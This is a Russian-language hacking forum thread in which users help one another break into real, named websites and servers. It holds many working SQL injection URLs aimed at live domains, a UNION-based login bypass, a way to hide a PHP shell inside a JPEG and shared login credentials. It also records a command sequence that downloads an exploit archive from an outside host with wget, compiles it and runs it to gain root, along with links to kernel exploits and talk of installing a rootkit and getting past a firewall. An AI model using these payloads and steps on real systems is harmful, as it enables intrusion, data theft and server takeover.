ATLANT_93 если ты хочешь присоединить троя или вирус, то джойнером. Но какое это отношение имеет к уязвимостям и данной теме?

Нет я хочу засунуть код на php в изображение

Есть страница ***?id=1
Если я пытаюсь что-то дописать в ID (+, +--+, 2-1, /*)
То получаю следующее:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "=" at character 642 in /var/www/html/dbms/trade.php on line 1099

Warning: pg_numrows(): supplied argument is not a valid PostgreSQL result resource in /var/www/html/dbms/trade.php on line 1101
Можно что-то из этого вытащить?

Судя по ошибке - есть вероятность инъекции. База данных - PostgreSQL
Коментарий "/*" не прокатит, так как даный коментарий должен быть закрыт, используйте "--".
Попробуйте вывесть системную информацию:

***id=1+and+1=cast((SELECT+version()||chr(58)||cur rent_user||chr(58)||current_database())+as+int)--


И подобрать количество полей:

Есть возможность использования конструкции order by

***id=1+order+by+100--
Или
***id=1+union+select+null,null,null,null,null,null--
или:
***id=1+union+select+1,2,3,4,5,6--

2Ins3t
чтобы я не дописывал кроме числа, всегда получаю выше описанную ошибку...

ATLANT_93, используйте WinHex.
Откройте ним вашу картинку, перейдите в конец (последнее значение - FF D9), замените FF D9 на 00 00, и после этих нолей вставне ваш php код, выбрав при этом формат добавляемых данных - ASCII.После вставленого кода напишите FF D9. Сохраните файл и все готово.
Поясни пожалуйста, что это за хренотень, и от чего, по твоему, это должно помогать.

ATLANT_93
По поводу шелла в картинке.
1 Метаданные
2 Просто переименовать расширение php файла
3 В конец файла

Пролезет или нет зависит ТОЛЬКО от проверок при загрузке, и манипуляции с FF D9 мне не понятны.

Gray_Wolf
Линк давай в тему, это не клуб экстрасенсов

2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
ага а

$cat pic.jpg shell.php > poisoned.jpg

это способ не знать про хекс эдитор.

чем вас хекс эдитор не устроил?
Гвозди можно забивать микроскопом, но зачем?
Зачем делать магический ритуал из простой вещи?
Конечно применить хекс-эдитор это мегахакерский ход. Двигать байты, делать при этом серьезное лицо, это круто.

2jokester
Это не "хренотень" как вы выразелись, это как раз таки способ запихнуть код в картинку без использования метаданных.
Я повторю свои вопросы более конкретно. Хотелось бы услышать ясный и чёткий ответ, если ты действительно понимаешь зачем это делать, а не просто тупо прочитал где-то (я даже знаю где) и теперь не задумываясь постишь это тут.

Вопросы:
Зачем я должен проделывать такие вещи с хекс эдитором?
Что КОНКРЕТНО это даёт?
Почему нужно менять именно эти байты?
Как это поможет при заливке картинки и что изменится если я этого делать не буду, а просто впихну код в конец никак не заморачиваясь с этими чудесами, или в метаданные, с которыми, кстати, заморачиваться не нужно, это элементарная операция?
Какую проверку это позволит обойти, из тех, что невозможно обойти предложенными мной вариантами?

Как проводить sql inj через POST.Когда в одно из полей вставляю кавычку вылазит ошибка-1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Соответственно скуля есть,а вот как раскрутить хз.Помогите пожалуста.

пиши все тоже самое что и в GET запросе но тока в то поле вот тебе и будет POST запрос

или в лисе перехвати запрос и поменяй его

Как проводить sql inj через POST.
Видимо передавать запрос POST-ом.
С уважением, Капитан Очевидность

Такой вопрос, всю голову сломал уже...

Нашел инъект, раскрутил, нашел пароль от админки, через админку можно заливать файлы с любым расширением, НО, php не выполняются, хтмл/гиф - отображаются корректно, а php - предлагается скачать файл при обращении, пробовал залить .htaccess в эту диру через админку - залилось вроде, проставил в нем выполнение html как php, бесполезно, что можно сделать?

Такой вопрос, всю голову сломал уже...

Нашел инъект, раскрутил, нашел пароль от админки, через админку можно заливать файлы с любым расширением, НО, php не выполняются, хтмл/гиф - отображаются корректно, а php - предлагается скачать файл при обращении, пробовал залить .htaccess в эту диру через админку - залилось вроде, проставил в нем выполнение html как php, бесполезно, что можно сделать?
В другие диры можешь файлы лить?

вполне возможно что там не апач а скажем nginx или их комбинация. Если это так то попытайся поискать дополнительную информацию в конфигах веб-сервера

Такой вопрос, всю голову сломал уже...

Нашел инъект, раскрутил, нашел пароль от админки, через админку можно заливать файлы с любым расширением, НО, php не выполняются, хтмл/гиф - отображаются корректно, а php - предлагается скачать файл при обращении, пробовал залить .htaccess в эту диру через админку - залилось вроде, проставил в нем выполнение html как php, бесполезно, что можно сделать?
Попробуй залить с расширением phtml или phps.

Нет у меня доступа ни к другим дирам, ни к чему вообще, только формочка в админке с выбором файла (изображение для постинга новостей, не фильтрует расширение). Можно ли как-то заставить сервер выполнять php скрипты в этой дире? Хтмл, яваскрипт, все пашет, пхп - нет, заливка .htaccess не помогает как я понял.
Других вариантов кроме шелла через админку - нет, даже не предлагайте.

"Попробуй залить с расширением phtml или phps."

Пробовал phtml - бесполезно, отображает содержимое скрипта, не воспринимает на исполнение в отличии от php, который воспринимается как скрипт-приложение.

Суть в том, что видимо в этом каталоге запрещено выполнение php-скриптов, заливка своего .htaccess не помогает видимо, пробовал разрешить выполнение .html, phtml и .jpg как php-скрипт - не катит, есть варианты?

pl,ssi вот ишо парочка вариантов

можно ли вместе с запросом типа "SELECT * FROM news WHERE id=g_ID", где g_ID не фильтрованное значение $_GET['id'] использовать запросы UPDATE или INSERT ?

Если mysql - нет.

всем привет!
При обращении к скрипту (бeз параметров) вылетает куча таких ошибок, можно ли это как нибудь раскрутить?

Warning: mysql_query() [function.mysql-query]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/xxx/domains/xxx.com/public_html/xxx.php on line 3

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/xxx/domains/xxx.com/public_html/xxx.php on line 3

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 3

Warning: mysql_query() [function.mysql-query]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/xxx/domains/xxx/public_html/xxx.php on line 4

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/xxx/domains/xxx/public_html/xxx.php on line 4

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 4
Warning: mysql_query() [function.mysql-query]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/xxx/domains/xxx/public_html/xxx.php on line 18

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/xxx/domains/xxx/public_html/xxx.php on line 18

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 19

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 20



Warning: mysql_query() [function.mysql-query]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/xxx/domains/xxx/public_html/xxx.php on line 33

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/xxx/domains/xxx/public_html/xxx.php on line 33

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 34

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/xxx/domains/xxx/public_html/xxx.php on line 35

Нет.

Нет.

Почему нельзя :eek:
Если попробовать манипуляции со скриптом, могут появится различные дополнительные ошибки :)

скуля тут не прокатит. Раскрытие путей разве что

unu']Почему нельзя :eek:
Если попробовать манипуляции со скриптом, могут появится различные дополнительные ошибки :)
Ну и толку? Раскрытие путей уже получили, но конекта то с БД нет .. конкретно с его скрипта доп-но ничего не выжать, учитывая ту информацию, что он предоставил в этой ветке.

такая проблема ,есть сайт надо найти админку,
site/admin/ 403 форбайден.
мне надо найди файлы в папке site/admin/,если ли софт для брута файлов?
можно канешно сгенирить списки,и прочекать линки ,но это на случай что спец софта нету

такая проблема ,есть сайт надо найти админку,
site/admin/ 403 форбайден.
мне надо найди файлы в папке site/admin/,если ли софт для брута файлов?
можно канешно сгенирить списки,и прочекать линки ,но это на случай что спец софта нету
Если в .htaccess на все файлы стоит Forbidden, то никак.

Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru ),505(shopua555),506(kamar),507(geniewgen)
Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux

mailbrush, пробуй другие, на милворме полно аналогичных

mailbrush, пробуй другие, на милворме полно аналогичных
Только эти аналогичные не хотят компилиться нигде...

Можно ли тут чтонить зделать тут ? у меня невышло =\
lineager.ru/lwdb/index.php?part=items&id=1+and+79=79

нельзя, там фильтруется

С запятыми не пашет вроде

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+i nformation_schema.tables+limit+1+offset+1)+from+1+ for+1))>1

http://lineager.ru/lwdb/index.php?part=items&id=1+and+5=@@version--

ЫЫ

Если в .htaccess на все файлы стоит Forbidden, то никак.

нет отдает 404 на файлы.
--
у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо!
-уже нашел)
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3

Если в .htaccess на все файлы стоит Forbidden, то никак.

Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru ),505(shopua555),506(kamar),507(geniewgen)
Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.

--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh

takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить

takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
фак читай от джока :(

takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить

Инъекция в ORDER BY.

chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.

--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
Эм... Что за exploit.so и где его взять? Он в результате запуска этого эксплоита должен создаться? И что за пулсаудио (гугл говорит, что голосвая система, но это бред=\ )?

нет, просто ошибка базы.
ничего внедрить нельзя :(
ошибка базы ? (
Это иньект в ордере ... только толку от него



Соре mailbrush опередил

С запятыми не пашет вроде

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+i nformation_schema.tables+limit+1+offset+1)+from+1+ for+1))>1
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?

По логике < >,а потом сравнением и смотрим по ascii табле символ
forum.antichat.ru/thread119047.html

а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+i nformation_schema.tables+limit+1+offset+n)+from+1+ for+1))>1

n=0 – первая таблица
n=1 – вторая таблица
n=2 – третья таблица и тд

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((select+table_name+from+i nformation_schema.tables+limit+1+offset+1)+from+n+ for+1))>1

n=1 – первый символ
n=2 – второй символ
n=3 – третий символ и тд

Автоматизируй процесс – накатай скрипт. Или уже готовый заюзай, тут где-то недалеко лежал

ЗЫ базу задротов тебе врятле удастся достать – л2 сервер работает под mssql (если не джава) и как правило доступ к табличкам пользователей имеет только сервер авторизации (или как там он называется не помню уже …). Хотя всякое бывает

только толку от него

more than 1 row

http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(substring(version(),1,1)=5,1,(select+col umn_name+from+information_schema.columns))

ну и соответственно далее как обычно

http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=1,if(ASCII(SUBSTRING((SELECT+table_name+FROM+ information_schema.tables+LIMIT+16,1),1,1))<102,1,(select+column_name+from+information_schema. columns))

============================

Помогите разобраться с MSSQL injection

Имеем:

SQL
?id=496'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+I NFORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM +INFORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

добавляем поля пока эта ошибка не пропадет...

SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATIO N_SCHEMA.TABLES--

ошибок не дает, но и ничего и не выводит

Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?

0o
Незадумывался : (....

bumerok
рыть лучше вот сюда:
https://forum.antichat.ru/thread30501.html

А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.

jokester

вот линк
тока нужно залогинится

log: bugsrc
pas: qwer1234

http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496'

+ почему-то из ie8 http 500, a из под ff 3.0.14 нормально
выводит ошибку
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.

bumerok, юзай подзапросы
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+to p+1+table_name+from+information_schema.tables);--

more than 1 row
если ?=(select name_const((select 1),1)) true, то лучше так:
http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&page=(select+1+from+(select+*+from+(select+name_co nst((select+concat_ws(0x3a,table_schema,table_name ,column_name)+from+information_schema.columns+wher e+column_name+like+0x70617373+limit+1),1),name_con st((select+concat_ws(0x3a,table_schema,table_name, column_name)+from+information_schema.columns+where +column_name+like+0x70617373+limit+1),1))a)b)#

Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:

function prov($var, $sql=true) {
$var= htmlspecialchars($var, ENT_QUOTES, "windows-1251");

if(get_magic_quotes_gpc ())
{
$var= stripslashes ($var);

}
if ($sql)
{
$var= mysql_real_escape_string ($var);
}
$var= strip_tags($var);
return $var;
}

Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:
for you with love (http://forum.antichat.ru/thread30641.html)

Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает :(

Можете кто нить разжевать в чем проблема.
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+fro m+INFORMATION_SCHEMA.tables+limit+6,1--
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--
и мне выдает ошибку
Database error: Invalid SQL: SELECT * FROM noticias where id_noticia = -321 UNION SELECT 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=PROFILING limit 0,1--
MySQL Error: 1054 (Unknown column 'PROFILING' in 'where clause')
Session halted.

че за херня ?(

Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
Цитата:
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--

потому что надо имя таблицы брать в кавычки

http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='PR OFILING'+limit+0,1--

но у тебя они слэшируются, значит переводи в hex


http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5 0524f46494c494e47--

как правильно использовать SQL Hex?
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
Нужно ещё что-то перед хексом прописать?

потому что надо имя таблицы брать в кавычки
но у тебя они слэшируются, значит переводи в hex

едрён батон, так вот почему у меня в старых записках в хексе было написано это :))) спс

Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?


Ну например заюзать between

1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+


Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт


А ты уверен, что что-то должно выдавать именно на этот логин? =)


Перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )


Какбэ и все

Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает :(

дык делать просто "=" и пройтись по всем нужным ASCII

Доброго времени суток.
имеется сайт на движке joomla (хз какая версия... - $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ (может кто подскажет что за версия))
путь к админке я нашёл, правда хз что с ней делать.
попробывал вот эту скуль index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql (любая цифра)] - на странице отобразилась шапка сайта и правая сторона, в середине всё пустое...(интересно что это даёт...).
затем нашёл путь _http://sate.ru/plugins/content/highslide/ там рисунки.
в чём самый прикол то, что какие бы скуль инжект не забивал в строку вот таким способом - _http://sate.ru/index.php..скульинжект то всё время показывает ошибку 404, а когда забиваю таким способом - _http://sate/administrator/index.php..скульинжект то ни чего не выдаётся и не изменяется, просто как бы прогрузочка прошла и всё...а что изменилось или нет...хз....
так вот может кто подскажет что да как, может ссылочки какие даст кто, а то всё уже перечитал, хочу ещё чёнить почитать повтыкать, или совет какой попробывать....
А цель вообще всего этого, попробывать БД стянуть, не так давно на этом ресурсе 3 акка моих кто то спёр, вот хочу попробывать тоже...заодно разобраться во всём этом...)))
зы. знаю 100% что другте люди тырят от туда базу, это очевидно по тому что мои данные стырили....
зыы. попробывал методы которые описываются здесь (https://forum.antichat.ru/threadnav43966-1-10.html) реакции ноль...

Работает или Microsoft-IIS/5.0 Htaccess?
надо сделать запрет на выполнение пхп
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3
он его не воспринимает вообще,если оно так и должно быть то как найти вход?

Shadrin, .ht* только для apache!

Есть бажный сайт, при подставке кавычки в авторизацию пишет
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]


Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...

Shadrin, .ht* только для apache!

Есть бажный сайт, при подставке кавычки в авторизацию пишет
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]


Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...
пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.

пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.
Запрос НЕ многострочный:
1. Запрос видно в ошибке.
2. Если бы я обрезал только одну строку комментарием #, то была бы ошибка.
3. Комментарий /* режет.

посмотри на запрос, у тебя он возвращает любой поле
авторизация (например) [данные-из-какой-то-колонки-customers]+pass
юзай вывод в ошибках
/add более подробно написано ниже)

Есть бажный сайт, при подставке кавычки в авторизацию пишет
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]


Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:

$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty

mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:

$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял :)

Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)

Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
Похоже на LFI

wolmer

мнеб по подробнее если можно :)

вот так поинтересней будет:


http://www.sys-tema.ru/index.jsp?pk=../


раскрытие пути, в исходниках

поднял рута, заинсталил руткит (tuxkit)... пытаюсь подконектиться, фаер блочит тупо. что посоветуете? как от него избавиться?

поднял рута, заинсталил руткит (tuxkit)... пытаюсь подконектиться, фаер блочит тупо. что посоветуете? как от него избавиться?
Бэкконект, как вариант (если я правильно тебя понял)...

подскажите при включеном листинге дирректорий только php файлы.
Можно как нибудь просмотреть их содержимое или на крайняк подключить в свой скрипт на locahost'e например?

ну если сервер не поддерживает php то их смотреть можно

ну если сервер не поддерживает php то их смотреть можно
поянтно значит нельзя...
А подключить в свой скрипт, например, можно?

Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.

Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
Ну во первых не /admin/index.php, а просто /admin/.
Во вторых сканеры ненайдут.

Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.


_http://security-digger.org/ , _http://forum.antichat.ru/thread40031.html

Привет всем. какие есть способы найти админку сайта? есть ли праги или скрипты для этого? ну короче чё делать если стандартные типа /admin/index.php или /admin.php неподходят.
Ну или хотя бы список возможных путей в админку.
попробуй прожкой site scanner она папки перебирает может че интересное найдешь
http://depositfiles.com/files/fbg1jvcpr

mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:

$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
test@domain.com
password
авторизация успешна, но при вводе
test@domain.com'#
password пишет, что пароль неверный.. Значит никак не обойти?

Такс вопрос

при '

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/prod-detail.asp, line 26

вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?


http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id1)#
выдает

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'id1' in 'field list' /prod-detail.asp, line 26

при http://wk/prod-detail.asp?ProductID=4429+or+0=(select%20id)#

страница отображается

Такс вопрос

при '

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

/prod-detail.asp, line 26

вопрос как реализовывать дальше =\ копать как MSSQL? or MySQL?
Я бы покопал в сторону Mysql

(хотя ошибка многое говорит (как ты уже знаешь если такая ошибка то значит не правильно работаем с Mysql))

MySQL говориш

http://wk/prod-detail.asp?ProductID=4429+and+b=system_user()

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown column 'b' in 'where clause' /prod-detail.asp, line 26

http://wk/prod-detail.asp?ProductID=4429+and+b=@@system_user

Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]Unknown system variable 'system_user' /prod-detail.asp, line 26

Знаешь, не везде есть такие вещи.
Например @@basedir не везде работает.
Где то почему то поразному.

Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
test@domain.com
password
авторизация успешна, но при вводе
test@domain.com'#
password пишет, что пароль неверный.. Значит никак не обойти?
там может быть двойные кавычки, ещё можно иньекцию на пароле проверить

HAXTA4OK, выведи version() и верь тому что там написано.

З.Ы.
А вообще это MySQL

пилин понять не могу :confused:

почему тогда пишет

http://wk/prod-detail.asp?ProductID=4429+and+id1

Microsoft OLE DB Provider for ODBC Drivers error '80040e31' [MySQL][ODBC 3.51 Driver][mysqld-5.0.37-community-nt]The used SELECT statements have a different number of columns /prod-detail.asp, line 26

а при http://wk/prod-detail.asp?ProductID=4429+and+id

все нормально :confused: страница грузится

ЗЫ mySQL нашел другую просто и провел ее..но все равно в задумках :)

HAXTA4OK, давай ссылку. Для телепатии недостаточно маны

http://www.edu-play.co.uk/prod-detail.asp?ProductID=4204+and+1=if(ascii(substring ((select+table_name+from+information_schema.tables +limit+0,1),1,1))>1,1,0)

Оно ?

не оно, SQL-inj нашел другую ..так что =) всем спс {/offtop]

Update - вопрос остался без ответа :(
Бэкконект, как вариант (если я правильно тебя понял)...
Ну не, это немного нето. Небудуж я его каждый раз запускать, палево млин. Мож кто нает как например разрешить конект на определенный порт? ибо например когда пингую говорит что сервер офф а из веба его видно.

warlok, iptables -L

warlok, iptables -L


Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- урл сайта anywhere tcp flags:!FIN,SYN,RST,ACK/SYN
ACCEPT udp -- урл сайта anywhere
ACCEPT tcp -- урл сайта anywhere tcp flags:!FIN,SYN,RST,ACK/SYN
ACCEPT udp -- урл сайта anywhere
ACCEPT all -- anywhere anywhere
ACCEPT icmp -- anywhere anywhere limit: avg 10/sec burst 5
DROP all -- anywhere 255.255.255.255
DROP all -- anywhere 198.202.66.255
DROP all -- base-address.mcast.net/8 anywhere
DROP all -- anywhere base-address.mcast.net/8
DROP all -- 255.255.255.255 anywhere
DROP all -- anywhere 0.0.0.0
DROP all -- anywhere anywhere state INVALID
LSI all -f anywhere anywhere limit: avg 10/min burst 5
INBOUND all -- anywhere anywhere
INBOUND all -- anywhere perutz.salk.edu
INBOUND all -- anywhere perutz.salk.edu
INBOUND all -- anywhere 198.202.66.255
